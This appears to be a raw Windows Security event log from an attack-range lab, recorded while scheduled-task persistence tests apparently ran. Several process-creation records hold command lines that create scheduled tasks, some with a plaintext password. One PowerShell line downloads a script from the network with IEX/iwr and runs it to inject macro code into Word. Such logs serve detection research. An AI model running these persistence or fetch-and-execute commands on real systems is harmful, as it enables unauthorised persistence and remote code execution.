SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278946
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x16e0
Process Name: C:\Windows\System32\TSTheme.exe
Exit Status: 0x0
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278945
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x370
New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$Action = New-ScheduledTaskAction -Execute \""calc.exe\""
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId \""BUILTIN\Administrators\"" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object}
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278944
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0xe08
Process Name: C:\Windows\System32\cmd.exe
Exit Status: 0x1
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278943
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x1438
Process Name: C:\Windows\System32\schtasks.exe
Exit Status: 0x1
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278942
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 628
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53923
Destination Address: 10.0.1.14
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278941
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 628
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53922
Destination Address: 10.0.1.14
Destination Port: 135
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278940
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 628
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53447
Destination Address: 10.0.1.14
Destination Port: 389
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278939
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 628
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 53447
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278938
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 53921
Destination Address: ::1
Destination Port: 49686
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278937
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5176
Application Name: \device\harddiskvolume1\windows\system32\schtasks.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 53921
Destination Address: ::1
Destination Port: 49686
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278936
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 5176
Application Name: \device\harddiskvolume1\windows\system32\schtasks.exe
Network Information:
Source Address: ::
Source Port: 53921
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278935
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 792
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 53920
Destination Address: ::1
Destination Port: 135
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278934
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5176
Application Name: \device\harddiskvolume1\windows\system32\schtasks.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 53920
Destination Address: ::1
Destination Port: 135
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278933
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 5176
Application Name: \device\harddiskvolume1\windows\system32\schtasks.exe
Network Information:
Source Address: ::
Source Port: 53920
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278932
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1438
New Process Name: C:\Windows\System32\schtasks.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0xe08
Creator Process Name: C:\Windows\System32\cmd.exe
Process Command Line: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST 20:10
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278931
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe08
New Process Name: C:\Windows\System32\cmd.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST 20:10"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887284
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1be8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887283
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 53923
Destination Address: 10.0.1.14
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887282
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 904
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 53922
Destination Address: 10.0.1.14
Destination Port: 135
Protocol: 6
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887281
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887280
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887279
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 53447
Destination Address: 10.0.1.14
Destination Port: 389
Protocol: 17
Filter Information:
Filter Run-Time ID: 66848
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278930
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53919
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278929
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x13dc
Process Name: C:\Windows\System32\cmd.exe
Exit Status: 0x0
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278928
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0xd20
Process Name: C:\Windows\System32\schtasks.exe
Exit Status: 0x0
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4698
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=278927
Keywords=Audit Success
Message=A scheduled task was created.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Task Information:
Task Name: \spawn
Task Content:
2021-04-19T18:27:53
WIN-HOST-5\Administrator
\spawn
2021-04-19T20:10:00
true
IgnoreNew
true
true
true
false
false
PT10M
PT1H
true
false
true
true
false
false
false
PT72H
7
C:\windows\system32\cmd.exe
WIN-HOST-5\Administrator
InteractiveToken
LeastPrivilege
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278926
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd20
New Process Name: C:\Windows\System32\schtasks.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x13dc
Creator Process Name: C:\Windows\System32\cmd.exe
Process Command Line: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278925
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13dc
New Process Name: C:\Windows\System32\cmd.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278948
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x16dc
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Exit Status: 0x1
04/19/2021 06:27:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278947
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887285
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1be8
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Exit Status: 0x1
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278953
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x1440
Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Exit Status: 0x0
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278952
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 5184
Application Name: \device\harddiskvolume1\windows\system32\windowspowershell\v1.0\powershell.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53924
Destination Address: 185.199.111.133
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278951
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1440
New Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x19c4
Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {IEX (iwr \""https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"" -UseBasicParsing)
Invoke-MalDoc -macroFile \""C:\AtomicRedTeam\atomics\T1053.005\src\T1053.005-macrocode.txt\"" -officeProduct \""Word\"" -sub \""Scheduler\""}
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278950
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Process Information:
Process ID: 0x370
Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Exit Status: 0x0
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4698
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Other Object Access Events
OpCode=Info
RecordNumber=278949
Keywords=Audit Success
Message=A scheduled task was created.
Subject:
Security ID: WIN-HOST-5\Administrator
Account Name: Administrator
Account Domain: WIN-HOST-5
Logon ID: 0x9E0C8
Task Information:
Task Name: \AtomicTask
Task Content:
\AtomicTask
true
S-1-5-32-544
HighestAvailable
IgnoreNew
true
true
true
false
false
PT10M
PT1H
true
false
true
true
false
false
false
true
false
PT72H
7
calc.exe
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887287
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1277
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887286
Keywords=Audit Success
